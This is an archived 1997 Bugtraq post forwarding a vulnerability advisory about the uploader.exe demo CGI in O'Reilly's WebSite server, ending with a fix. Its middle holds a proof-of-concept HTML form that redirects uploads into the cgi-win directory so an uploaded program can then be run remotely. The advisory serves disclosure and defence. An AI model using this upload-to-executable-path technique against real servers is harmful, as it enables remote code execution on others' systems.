[5256] in bugtraq
[Alert] Website's uploader.exe (from demo) vulnerable
daemon@ATHENA.MIT.EDU (Aleph One)
Thu Sep 4 19:10:50 1997
Date: Thu, 4 Sep 1997 16:59:12 -0500
Reply-To: Aleph One <aleph1@DFW.NET>
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
---------- Forwarded message ----------
Date: Thu, 4 Sep 1997 21:38:57 +0200
From: Herman de Vette <herman@INFO.NL>
To: NTBUGTRAQ@NTADVICE.COM
Subject: [Alert] Website's uploader.exe (from demo) vulnerable
[Alert] Website's uploader.exe (from demo) vulnerable
Check out what I found today (hope it's not an known bug yet)
O'reilly's webserver 'website' contains a demopackage that contains
the cgi-program uploader.exe. The following html-page was included with
it:
----------------------------------------
<HTML><HEAD><TITLE>Upload a File</TITLE></HEAD>
<BODY>
<H1>Upload a file</H1>
<hr>
<h2>NOTE: Your browser must support file uploading.</H2>
<FORM ENCTYPE="multipart/form-data" METHOD=POST
ACTION="/cgi-win/uploader.exe/Uploads/">
<PRE>Your name: <INPUT TYPE=TEXT SIZE=20 NAME="name"> (required)
Email address: <INPUT TYPE=TEXT SIZE=20 NAME="email"> (required)
<b>NOTE:</b> If you don't see a "browse" button below,
your browser
doesn 't support form-based file uploading. Netscape
2.0 and
later have this support.
File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40>
File description: <INPUT TYPE=TEXT SIZE=40 NAME="desc"> (required)
<INPUT TYPE=SUBMIT VALUE="Upload Now"></PRE>
</FORM>
<HR>
<A HREF="mailto:...">
<address>...</address>
</A></BODY></HTML>
-----------------------------------------
The program uploader.exe doesn't check anything at all. If you're lucky
you're running windows NT
and have put only "read/execute access" on cgi-win and other executable
paths. Otherwise (win95) you
have a real problem. You could create a CGI-program, next you change the
HTML-file a little like this:
-----------------------------------------
<HTML><HEAD><TITLE>Upload Any File Anywhere</TITLE></HEAD>
<BODY>
<FORM ENCTYPE="multipart/form-data" METHOD=POST
ACTION="http://host.of.vulnerable.website/cgi-win/uploader.exe/cgi-win/">
<INPUT TYPE=HIDDEN NAME="name" VALUE="Foo">
<INPUT TYPE=HIDDEN NAME="email" VALUE="Foo@bar.com>
File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40><BR>
<INPUT TYPE=TEXT SIZE=40 NAME="desc" VALUE="YouGottaSecurityProblem">
<INPUT TYPE=SUBMIT VALUE="Upload Now">
</FORM>
</BODY></HTML>
------------------------------------------
open the html-file in your browser, select a nice CGI-file to upload
And run that CGI-program remotely. (No need to tell you what this
CGI-program could do,
could be .bat file too in one of website's other cgi-directories)
SOLUTION: remove uploader.exe, delete it, empty your trash bin and use
ftp for file-upload
Herman de Vette
herman@info.nl
